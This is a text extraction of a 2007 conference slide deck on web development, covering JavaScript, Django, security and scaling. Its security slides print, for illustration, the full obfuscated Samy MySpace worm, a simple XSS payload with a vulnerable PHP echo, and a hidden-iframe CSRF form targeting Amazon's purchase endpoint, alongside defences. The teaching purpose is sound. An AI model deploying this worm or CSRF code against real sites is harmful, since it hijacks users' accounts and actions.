SlideShare a Scribd company logo
1 of 115
Download to read offline
How to build the Web
        Simon Willison
     30th November 2007
This talk

• Modern client-side engineering
• Server-side engineering and web frameworks
• Web application security
• Building sites that scale
What to build        How to build it

Product design




                                             Browsers!
Information architecture
                              Client-side
                              engineering
User experience

Social software design




                                             Servers!
Usability                     Server-side
                              engineering
Marketing

...
Client-side engineering
The great myth of
client-side development
     “It’s way easier than server-side
  development - after all, it’s just HTML”
That’s hogwash
“Yahoo! Juku is a comprehensive, 3-6 month
   program to train professional front end
   developers. The curriculum includes advanced
   topics in JavaScript, DOM, HTML, CSS,YUI,
   performance, and accessibility.

   Why train raw recruits to this degree? Well,
   in the San Francisco Bay Area,
   including the Silicon Valley, it’s
   hard-as-heck to find good front end
   programmers and web designers.”




http://developer.yahoo.net/blog/archives/2007/11/the_harvard_of.html
Quines

char*f=quot;char*f=%c%s%c;main()
{printf(f,34,f,34,10);}%cquot;;
main(){printf(f,34,f,34,10);}
(*O/*_/
                                                                                       http://ideology.com.au/polyglot/
Cu #%* )pop mark/CuG 4 def/# 2 def%%%%@@P[TX---PP_SXPY!Ex(mx2ex(quot;SX!Ex4P)Ex=
CuG #%*                                                                      *+Ex=
CuG #%*------------------------------------------------------------------*+Ex=




                                          Polyglots
CuG #%*    POLYGLOT - a program in eight languages       15 February 1991 *+Ex=
CuG #%*    10th Anniversary Edition                        1 December 2001 *+Ex=
CuG #%*    Written by Kevin Bungard, Peter Lisle, and Chris Tham             *+Ex=
CuG #%*------------------------------------------------------------------*QuZ=
CuG #%*                                                                      *+Ex=
CuG #%*!Mx)ExQX5ZZ5SSP5n*5X!)Ex+ExPQXH,B+ExP[-9A-9B(g?(gA'UTTER_XYZZXX!X *+
CuG #(*                                                                      *(
C   # */);                                                                 /*(
C   # *) program           polyglot (output);                              (*+
C   #      identification division.

                                                                                                  C
C   #      program-id.     polyglot.
C   #
C   #      data            division.
                                                                                                 Perl
C   #      procedure       division.
C   #

                                                                                                Pascal
C   # * ))cleartomark     /Bookman-Demi findfont 36 scalefont setfont      (
C   #*                                                                     (
C   #

                                                                                               Fortran
C   #*                     hello polyglots$
C   #      main.

                                                                                               COBOL
C   #           perform
C /# * ) 2>_$$; echo      quot;hello polyglotsquot;; rm _$$; exit;
C   #*(

                                                                                              PostScript
C   #
C      *0 ) unless print quot;hello polyglotsnquot;; __END__

                                                                                             bash/sh/csh
                print
C               stop run.
      -*,                 'hello polyglots'

                                                                                            x86 assembler
C
C          print.
C               display   quot;hello polyglotsquot;.                               (
C      */ int i;                                                           /*
C      */ main () {                                                        /*
C      */       i=printf (quot;hello polyglotsnquot;); O= &i; return *O;          /*
C      *)                                                                  (*
C      *) begin                                                            (*
C      *)       writeln ('hello polyglots');                               (*
C      *)                                                                  (* )
C      * ) pop 60 360                                                      (
C      * ) pop moveto     (hello polyglots) show                           (
C      * ) pop showpage                                                    ((
C      *)
            end                                                            .(* )
C)pop%      program        polyglot.                                       *){*/}
Rendering engines
Rendering engines
Opera desktop       Safari
Opera mobile       iPhone
Nintendo Wii    Nokia Series 60
Nintendo DS     Google Android

   Firefox
 Ice weasel     Sadly still 85%
   Camino       of the market
   Galleon
IE is the problem child
• Microsoft simply stopped updating it once
  they had won the browser wars... IE 6 came
  out in 2001!
• Still has shaky support for CSS 2.1
• Many JavaScript APIs developed before
  standards even existed
• Requires a disproportionate amount of
  development time
• Status of IE 8 is uncertain
Recommendations
• Develop to the standards using Firefox
• The cases where IE deviates from the
  standards are relatively well understood, and
  can usually be worked around
• Avoid CSS hacks; conditional comments are
  your friend
  <!--[if IE]><link rel=quot;stylesheetquot; type=quot;text/
  cssquot; href=quot;/static/ieonly.cssquot;><![endif]-->
Accessibility
•   Assistive technology thrives on semantic HTML

    •   <label> elements for forms

    •   <h1>...<h6> headers for structure

    •   Avoiding tables for layout

•   Watch a video of a screen reader user; they may well
    browse faster than you do

•   Accessibility is much more than just screen readers -
    colour blindness, motor disorders, learning
    disabilities, even just poor eyesite
JavaScript
    “JavaScript was a rushed little hack for
Netscape 2 that was then frozen prematurely
     during the browser wars, and evolved
 significantly only once by ECMA. So its early
     flaws were never fixed, and worse, no
   virtuous cycle of fine-grained community
         feedback [...] ever occurred.”
                              -Brendan Eich
But despite that...
• JavaScript is actually a really neat little
   language
  • Functions are first-class objects
  • Lexical closures
  • Objects are hash tables
• If you take the time to learn it, it will repay
   you handsomely
Ajax
February 2005
AJAX v.s. Ajax
  “Asynchronous
JavaScript + XML”
AJAX v.s. Ajax
                    “Any technique that
  “Asynchronous
                     allows the client to
JavaScript + XML”
                     retrieve more data
                       from the server
                    without reloading the
                         whole page”
Unobtrusive JavaScript
• JavaScript isn't always available
 • Security conscious organisations (and
    users) sometimes disable it
  • Some devices may not support it (mobile
    phones for example)
  • Assistive technologies (screen readers)
    may not play well with it
  • Search engine crawlers won't execute it
• Unobtrusive: stuff still works without it!
Progressive enhancement
• Start with solid markup
• Use CSS to make it look good
• Use JavaScript to enhance the usability of the
  page


• The content remains accessible no matter
  what
Unobtrusive examples
labels.js




• One of the earliest examples of this
  technique, created by Aaron Boodman (now
  of Greasemonkey and Google Gears fame)
How it works
         <label for=quot;searchquot;>Search</label>
         <input type=quot;textquot; id=quot;searchquot; name=quot;qquot;>

• Once the page has loaded, the JavaScript:
 • Finds any label elements linked to a text field
 • Moves their text in to the associated text field
 • Removes them from the DOM
 • Sets up the event handlers to remove the
    descriptive text when the field is focused
• Clean, simple, reusable
easytoggle.js
  • An unobtrusive technique for revealing
     panels when links are clicked

<ul>
  <li><a href=quot;#panel1quot; class=quot;togglequot;>Panel 1</a></li>
  <li><a href=quot;#panel2quot; class=quot;togglequot;>Panel 2</a></li>
  <li><a href=quot;#panel3quot; class=quot;togglequot;>Panel 3</a></li>
</ul>


<div id=quot;panel1quot;>...</div>
<div id=quot;panel2quot;>...</div>
<div id=quot;panel3quot;>...</div>
How it works
•   When the page has loaded...

    •   Find all links with class=quot;togglequot; that reference an
        internal anchor

    •   Collect the elements that are referenced by those
        anchors

    •   Hide all but the first

    •   Set up event handlers to reveal different panels when a
        link is clicked

•   Without JavaScript, links still jump to the right point
Django filter lists

• Large multi-select boxes aren't much fun
 • Painful to scroll through
 • Easy to lose track of what you have
    selected
• Django's admin interface uses unobtrusive
  JavaScript to improve the usability here
• Ajax is often used to avoid page refreshes
• So...
 • Write an app that uses full page refreshes
 • Use unobtrusive JS to quot;hijackquot; links and
    form buttons and use Ajax instead

• Jeremy Keith coined the term quot;Hijaxquot; to
  describe this
JavaScript libraries
      “The bad news:
  JavaScript is broken.
      The good news:
   It can be fixed with
    more JavaScript!”
                 - Geek folk saying
Main contenders
• Prototype
• The Yahoo! User Interface Library
• The Dojo Toolkit
• jQuery
• It’s worth evaluating these in detail, but if
  you only have time to learn one...
The short answer: use jQuery
Client-side performance
• Relatively new field, pioneered by the
  performance team at Yahoo!
• A few simple changes can make a huge
  difference to perceived loading times
• Example tip: serve your static files (CSS,
  images etc) from a separate domain - that
  way the cookies from your regular domain
  won’t slow down the requests
Server-side engineering
URL design


(Yes, I should probably be calling them URIs)
Bad URLs
    example.com/index.html
    example.com/article.php?sectionId=2343&contentId=638
    example.com/blog/2007/December.aspx
    www.amazon.com/dp/0596516177?
    tag=davidflanagancom&camp=14573&creative=327641&linkCode=as1&
    creativeASIN=0596516177&adid=165MWWERY4H71AJERGNZ&

•   Unnecessary filenames

•   Expose implementation details

•   Overly complex
Characteristics of
       good URLs
• “Cool URIs don’t change”
• Guessable
• Hackable
• Readable over the phone
• Reflects the hierarchy of the site and its data
A good URL
• simonwillison.net/2007/Nov/27/thumbnail/
• Short, hackable, no implementation exposed
• No matter what you’re building, including
  the year can be really useful in allowing you
  to change your opinion on your URLs later
  on without breaking old links
The Open Source stack
• The only option I would consider
• Open source means:
 • Zero vendor lock-in; many open-source
    components are interchangeable
 • Better support (fix it yourself, or pay
    someone smart to fix it for you)
 • Less bugs and better quality code
Dynamic languages




   http://xkcd.com/303/
Dynamic languages
•   Social applications in particular are almost
    impossible to get right first time

•   Development only really starts after you’ve
    launched something and seen what people use
    it for

•   Speed and flexibility of development are critical

•   Dynamic languages let you get more done with
    less lines of code (which means less bugs)
LAMP

• Linux
• Apache
• MySQL
• PHP/Perl/Python
LAMP, evolved

• Linux / FreeBSD / Solaris
• Apache / Lighttpd / nginx / ...
• MySQL / PostgreSQL
• PHP/Perl/Python / Ruby
Web frameworks

• Ruby: Ruby on Rails
• Python: Django, Pylons, TurboGears
• PHP: Symfony, CakePHP, Zend Framework
• Perl: Catalyst, Maypole
Web frameworks

• Ruby: Ruby on Rails
• Python: Django, Pylons, TurboGears
• PHP: Symfony, CakePHP, Zend Framework
• Perl: Catalyst, Maypole
Django
Lawrence, Kansas - 2003
• Two developers
• Two designers
• Around a dozen editorial staff
How do you build a site
   like lawrence.com?
• Interns - unpaid labour!
• A big relational database
 • Newspaper people are baffled by these...
• ... so you need a good interface for it
• And as many development shortcuts as possible
Characteristics

• Clean URLs
• Loosely coupled components
• Designer-friendly templates
• Less code
• The “good bits” from PHP
The Django stack
• HTTP handling
• Models (an ORM)
• Views
• Templates
• Extras
 • Admin, RSS framework, generic views...
The Django workflow

• Build the models
• Instant admin! Content people can start
  adding data
• Writing the views
• Throw the templates to the designers
Open source Django
•   Django has been open-source since mid-2005
    •   The newspaper has been able to hire
        excellent developers from the community
    •   The newspaper CMS is sold as Ellington;
        one of the features is that you can hire your
        own Django developers to modify it
    •   Django has been hugely improved by
        contributions from outside the newspaper
www.djangosites.org
www.djangoproject.com
Don’t Repeat Yourself
All frameworks provide:

• A recommended way of laying out code
• Separation of application and presentation
  logic using a template system
• An ORM, to reduce the amount of code
  needed to talk to a database
• Reusable components for common tasks
Security
Three key attacks


• SQL injection
• XSS (cross-site scripting)
• CSRF (cross-site request forgery)
SQL injection
• SQL injection is inexcusable
• If the environment you are using doesn’t
  protect against this for you (through
  parameterised queries), use a different tool
Cross-site scripting

• The most common security hole on the web
  http://example.com/search?q=<script>alert(quot;helloquot;);</script>
  You searched for <?php echo $_GET['q']; ?>

• Massive security hole!
XSS attackers can...
• Replace your logo with something obscene
• Steal your user’s authentication cookies
• Re-target login forms to point to a password
  stealing script
• Perform any action that the user is allowed
  to perform themselves
• Create self-propagating worms
http://namb.la/popular/   http://namb.la/popular/tech.html

          samy is my hero
<div id=mycode style=quot;BACKGROUND: url('java
script:eval(document.all.mycode.expr)')quot; expr=quot;var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var
D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function
getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var
E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split
('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if
(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M)
{getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var
N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while
(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval
('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-
urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)
+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn
(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var
V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var
Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new
ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var
AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE)
{AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}
var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring
(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']
='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?
fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}
var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS
['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?
fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/
index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend
(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?
fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if
(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL
(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?
fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2)
{return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-
Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}quot;></
DIV>
HTML is dangerous
• It’s best not to allow un-trusted users to
  submit HTML at all
• If you let them submit HTML, you’ll need an
  industrial grade HTML parser (which
  emulates browsers, not just the HTML spec)
  and a very restrictive whitelist
• CSS can include JavaScript, and even regular
  CSS positioning can be used for phishing
CSRF
•   Much less widely understood than XSS...

•   ... but almost certainly more common

•   Cross-site request forgery attacks allow
    attackers to force your users to take actions on
    your site that they didn’t mean to take
•   <img src=quot;http://example.com/admin/delete.php?id=5quot;>

•   Not just GET; hidden forms allow POST as well
<iframe style=quot;width: 0px; height: 0px; visibility:
hiddenquot; name=quot;hiddenquot;></iframe>
<form name=quot;csrfquot; action=quot;http://amazon.com/gp/
product/handle-buy-boxquot; method=quot;postquot; target=quot;hiddenquot;>
<input type=quot;hiddenquot; name=quot;ASINquot; value=quot;059600656Xquot; />
<input type=quot;hiddenquot; name=quot;offerListingIDquot;
value=quot;XYPvvbir%2FyHMyphE%2Fy0hKK%2BNt%2FB7%
2FlRTFpIRPQG28BSrQ98hAsPyhlIn75S3jksXb3bdE%
2FfgEoOZN0Wyy5qYrwEFzXBuOgqfquot; />
</form>
<script>document.forms.csrf.submit();</script>



  http://shiflett.org/blog/2007/mar/my-amazon-anniversary
Defence against CSRF

• You need to know if the form that is being
  submitted is one that you served up from
  your own site (as opposed to an evil form
  created by an attacker)
• Include a hidden form field with a token
  generated by your site and associated with
  the logged in user in a non-predictable way
Building sites that scale
Scalability is not
 performance
Scalability is not
       performance
Scalable systems increase their performance
 as new hardware is added, proportional to
           the hardware’s capacity
Vertical v.s. horizontal
•   Vertical scaling: buy a bigger machine

    •   More RAM

    •   More CPU(s)

    •   “Big iron” costing $100,000+

•   Horizontal scaling: buy more machines

    •   Almost always better than vertical scaling

    •   But... software must be designed to scale out
“Premature
optimisation is the
 root of all evil”
             - Tony Hoare and
               Donald Knuth
http://blog.ilike.com/ilike_team_blog/2007/06/holy_cow_6mm_us.html
“Shared nothing”
• Rasmus Lerdorf, the creator of PHP,
  describes this as a key principle of scaling
• Application servers (web servers running
  PHP) have no shared state - everything
  stateful is pushed out to the database layer
• This lets you trivially horizontally scale your
  application servers behind a load balancer
• Now you just have to scale the data layer...
Four steps to building a
  scalable data layer
• Add caching
• De-normalise where necessary
• Add database replication
• Add sharding
Caching
• You could cache to disk or shared memory...
• ... but you’re better off using memcached
 • Distributed key/value in-memory caching
    system, first developed for LiveJournal
 • Facebook,YouTube, Wikipedia, Flickr...
    obj = memcache.get(obj_id)
    if not obj:
        obj = construct_obj_from_database(obj_id)
        memcache.put(obj_id, obj)
    return obj
“Normalised data
        is for sissies”
                          Cal Henderson, Flickr

• You can get a major speed-up by duplicating
  some data (e.g. counts) in your database
• Your application logic will need to keep
  everything in sync
Replication
• Master-slave replication lets you set up
  copies of the database to accelerate reads

            Writes all go
            to master
                                    Master




               Slave                Slave                Slave




                        Reads spread across all slaves
Replication
•   Master-master replication provides redundant
    masters, but doesn’t really improve write
    performance (both still have to make the same
    number of writes)
           Writes all go
           to masters
                               Master              Master




                     Slave               Slave                Slave




                             Reads spread across all slaves
Sharding
• Sometimes known as federation
• Users 1-1000 are on database A, 1000-2000
  are on database B...
• Often requires a large scale re-write of the
  system
• Much harder to do in social applications
  where relationships span multiple databases
• WordPress MU is an interesting case-study
Scalable business models
•   Scaling gets a lot easier if you build it in to your
    business model

    •   37signals products (Basecamp, Highrise)
        shard naturally based on individual customer
        accounts - and more customers means more
        money for servers

    •   Second Life shards by land area, and land
        has to be bought by users - they’re essentially a
        3D web hosting company
Build it on Amazon
• S3 - Simple Storage Service
 • Cheap, robust key-value storage of both
    small and large files
• EC2 - Elastic Compute Cloud
 • On-demand instant virtual servers, billed
    by the hour
• SQS - Simple Queue Service
Thank you!
Thank you!

More Related Content

Similar to How to build the Web

[Td 2015] what is new in visual c++ 2015 and future directions(ulzii luvsanba...
[Td 2015] what is new in visual c++ 2015 and future directions(ulzii luvsanba...[Td 2015] what is new in visual c++ 2015 and future directions(ulzii luvsanba...
[Td 2015] what is new in visual c++ 2015 and future directions(ulzii luvsanba...
Sang Don Kim
 

Similar to How to build the Web (20)

Hidden Dragons of CGO
Hidden Dragons of CGOHidden Dragons of CGO
Hidden Dragons of CGO
 
LISA Qooxdoo Tutorial Handouts
LISA Qooxdoo Tutorial HandoutsLISA Qooxdoo Tutorial Handouts
LISA Qooxdoo Tutorial Handouts
 
Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?
 
Not Your Fathers C - C Application Development In 2016
Not Your Fathers C - C Application Development In 2016Not Your Fathers C - C Application Development In 2016
Not Your Fathers C - C Application Development In 2016
 
[Td 2015] what is new in visual c++ 2015 and future directions(ulzii luvsanba...
[Td 2015] what is new in visual c++ 2015 and future directions(ulzii luvsanba...[Td 2015] what is new in visual c++ 2015 and future directions(ulzii luvsanba...
[Td 2015] what is new in visual c++ 2015 and future directions(ulzii luvsanba...
 
C Under Linux
C Under LinuxC Under Linux
C Under Linux
 
How to configure an environment to cross-compile applications for beagleboard-xM
How to configure an environment to cross-compile applications for beagleboard-xMHow to configure an environment to cross-compile applications for beagleboard-xM
How to configure an environment to cross-compile applications for beagleboard-xM
 
Golang 101 for IT-Pros - Cisco Live Orlando 2018 - DEVNET-1808
Golang 101 for IT-Pros - Cisco Live Orlando 2018 - DEVNET-1808Golang 101 for IT-Pros - Cisco Live Orlando 2018 - DEVNET-1808
Golang 101 for IT-Pros - Cisco Live Orlando 2018 - DEVNET-1808
 
The Dojo Build System
The Dojo Build SystemThe Dojo Build System
The Dojo Build System
 
Conan a C/C++ Package Manager
Conan a C/C++ Package ManagerConan a C/C++ Package Manager
Conan a C/C++ Package Manager
 
Getting started with open mobile development on the Openmoko platform
Getting started with open mobile development on the Openmoko platformGetting started with open mobile development on the Openmoko platform
Getting started with open mobile development on the Openmoko platform
 
Practical Groovy DSL
Practical Groovy DSLPractical Groovy DSL
Practical Groovy DSL
 
Moving from Jenkins 1 to 2 declarative pipeline adventures
Moving from Jenkins 1 to 2 declarative pipeline adventuresMoving from Jenkins 1 to 2 declarative pipeline adventures
Moving from Jenkins 1 to 2 declarative pipeline adventures
 
Os Wilhelm
Os WilhelmOs Wilhelm
Os Wilhelm
 
Metasepi team meeting #6: "Snatch-driven development"
Metasepi team meeting #6: "Snatch-driven development"Metasepi team meeting #6: "Snatch-driven development"
Metasepi team meeting #6: "Snatch-driven development"
 
Cape Cod Web Technology Meetup - 3
Cape Cod Web Technology Meetup - 3Cape Cod Web Technology Meetup - 3
Cape Cod Web Technology Meetup - 3
 
SECCOM 2017 - Conan.io o gerente de pacote para C e C++
SECCOM 2017 - Conan.io o gerente de pacote para C e C++SECCOM 2017 - Conan.io o gerente de pacote para C e C++
SECCOM 2017 - Conan.io o gerente de pacote para C e C++
 
Makefiles in 2020 — Why they still matter
Makefiles in 2020 — Why they still matterMakefiles in 2020 — Why they still matter
Makefiles in 2020 — Why they still matter
 
AFUP Lorraine - Symfony Webpack Encore
AFUP Lorraine - Symfony Webpack EncoreAFUP Lorraine - Symfony Webpack Encore
AFUP Lorraine - Symfony Webpack Encore
 
C++ Core Guidelines
C++ Core GuidelinesC++ Core Guidelines
C++ Core Guidelines
 

More from Simon Willison

Building Things Fast - and getting approval
Building Things Fast - and getting approvalBuilding Things Fast - and getting approval
Building Things Fast - and getting approval
Simon Willison
 
Rediscovering JavaScript: The Language Behind The Libraries
Rediscovering JavaScript: The Language Behind The LibrariesRediscovering JavaScript: The Language Behind The Libraries
Rediscovering JavaScript: The Language Behind The Libraries
Simon Willison
 

More from Simon Willison (20)

How Lanyrd does Geo
How Lanyrd does GeoHow Lanyrd does Geo
How Lanyrd does Geo
 
Cheap tricks for startups
Cheap tricks for startupsCheap tricks for startups
Cheap tricks for startups
 
The Django Web Framework (EuroPython 2006)
The Django Web Framework (EuroPython 2006)The Django Web Framework (EuroPython 2006)
The Django Web Framework (EuroPython 2006)
 
Building Lanyrd
Building LanyrdBuilding Lanyrd
Building Lanyrd
 
How we bootstrapped Lanyrd using Twitter's social graph
How we bootstrapped Lanyrd using Twitter's social graphHow we bootstrapped Lanyrd using Twitter's social graph
How we bootstrapped Lanyrd using Twitter's social graph
 
Web Services for Fun and Profit
Web Services for Fun and ProfitWeb Services for Fun and Profit
Web Services for Fun and Profit
 
Tricks & challenges developing a large Django application
Tricks & challenges developing a large Django applicationTricks & challenges developing a large Django application
Tricks & challenges developing a large Django application
 
Advanced Aspects of the Django Ecosystem: Haystack, Celery & Fabric
Advanced Aspects of the Django Ecosystem: Haystack, Celery & FabricAdvanced Aspects of the Django Ecosystem: Haystack, Celery & Fabric
Advanced Aspects of the Django Ecosystem: Haystack, Celery & Fabric
 
How Lanyrd uses Twitter
How Lanyrd uses TwitterHow Lanyrd uses Twitter
How Lanyrd uses Twitter
 
ScaleFail
ScaleFailScaleFail
ScaleFail
 
Building Things Fast - and getting approval
Building Things Fast - and getting approvalBuilding Things Fast - and getting approval
Building Things Fast - and getting approval
 
Rediscovering JavaScript: The Language Behind The Libraries
Rediscovering JavaScript: The Language Behind The LibrariesRediscovering JavaScript: The Language Behind The Libraries
Rediscovering JavaScript: The Language Behind The Libraries
 
Building crowdsourcing applications
Building crowdsourcing applicationsBuilding crowdsourcing applications
Building crowdsourcing applications
 
Evented I/O based web servers, explained using bunnies
Evented I/O based web servers, explained using bunniesEvented I/O based web servers, explained using bunnies
Evented I/O based web servers, explained using bunnies
 
Cowboy development with Django
Cowboy development with DjangoCowboy development with Django
Cowboy development with Django
 
Crowdsourcing with Django
Crowdsourcing with DjangoCrowdsourcing with Django
Crowdsourcing with Django
 
Django Heresies
Django HeresiesDjango Heresies
Django Heresies
 
Class-based views with Django
Class-based views with DjangoClass-based views with Django
Class-based views with Django
 
Web App Security Horror Stories
Web App Security Horror StoriesWeb App Security Horror Stories
Web App Security Horror Stories
 
Web Security Horror Stories
Web Security Horror StoriesWeb Security Horror Stories
Web Security Horror Stories
 

Recently uploaded

Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo DiehlFuture Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Peter Udo Diehl
 

Recently uploaded (20)

Powerful Start- the Key to Project Success, Barbara Laskowska
Powerful Start- the Key to Project Success, Barbara LaskowskaPowerful Start- the Key to Project Success, Barbara Laskowska
Powerful Start- the Key to Project Success, Barbara Laskowska
 
Extensible Python: Robustness through Addition - PyCon 2024
Extensible Python: Robustness through Addition - PyCon 2024Extensible Python: Robustness through Addition - PyCon 2024
Extensible Python: Robustness through Addition - PyCon 2024
 
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfHow Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
 
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo DiehlFuture Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
 
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
 
IESVE for Early Stage Design and Planning
IESVE for Early Stage Design and PlanningIESVE for Early Stage Design and Planning
IESVE for Early Stage Design and Planning
 
Connecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAKConnecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAK
 
Designing for Hardware Accessibility at Comcast
Designing for Hardware Accessibility at ComcastDesigning for Hardware Accessibility at Comcast
Designing for Hardware Accessibility at Comcast
 
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeFree and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
 
Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdf
Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdfSimplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdf
Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdf
 
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
 
Oauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoftOauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoft
 
Optimizing NoSQL Performance Through Observability
Optimizing NoSQL Performance Through ObservabilityOptimizing NoSQL Performance Through Observability
Optimizing NoSQL Performance Through Observability
 
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomSalesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
 
PLAI - Acceleration Program for Generative A.I. Startups
PLAI - Acceleration Program for Generative A.I. StartupsPLAI - Acceleration Program for Generative A.I. Startups
PLAI - Acceleration Program for Generative A.I. Startups
 
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
 
Introduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdf
Introduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdfIntroduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdf
Introduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdf
 
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxUnpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
 
Syngulon - Selection technology May 2024.pdf
Syngulon - Selection technology May 2024.pdfSyngulon - Selection technology May 2024.pdf
Syngulon - Selection technology May 2024.pdf
 
Where to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdfWhere to Learn More About FDO _ Richard at FIDO Alliance.pdf
